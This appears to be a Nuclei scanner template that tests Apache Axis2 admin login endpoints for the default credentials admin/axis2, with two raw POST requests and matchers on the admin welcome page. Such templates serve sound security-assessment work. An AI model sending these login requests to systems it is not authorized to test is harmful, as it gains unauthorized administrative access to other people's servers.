id: axis2-default-login

info:
  name: Axis2 Default Login
  author: pikpikcu
  severity: high
  tags: axis,apache,default-login

requests:
  - raw:
      - |
        POST /axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername={{username}}&loginPassword={{password}}

      - |
        POST /axis2/axis2-admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&password={{password}}&submit=+Login+

    payloads:
      username:
        - admin
      password:
        - axis2
    attack: pitchfork

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<h1>Welcome to Axis2 Web Admin Module !!</h1>"

      - type: status
        status:
          - 200
